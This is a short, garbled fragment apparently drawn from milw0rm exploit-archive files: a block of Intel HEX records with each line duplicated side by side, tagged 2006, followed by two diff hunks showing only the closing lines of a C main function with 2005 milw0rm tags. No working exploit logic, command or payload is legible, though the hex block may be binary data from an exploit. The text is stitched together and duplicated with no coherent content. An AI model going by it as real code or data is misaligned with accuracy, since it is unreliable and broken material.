:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B :10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94 :1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978 :1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D :100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA :100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E :1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14 :1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7 :1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003 :1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066 :1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122 :0400F000658014F122
:00000001FF :00000001FF
# milw0rm.com [2006-02-22] # milw0rm.com [2006-02-22]


@ -225,6 +225,6 @@ main(int argc, char **argv)
fclose(fp); fclose(fp);
return 0; return 0;
} }
// milw0rm.com [2005-01-22] // milw0rm.com [2005-01-22]


@ -235,6 +235,6 @@ main(int argc, char **argv)
fclose(fp); fclose(fp);
return 0; return 0;
} }
// milw0rm.com [2005-01-24] // milw0rm.com [2005-01-24]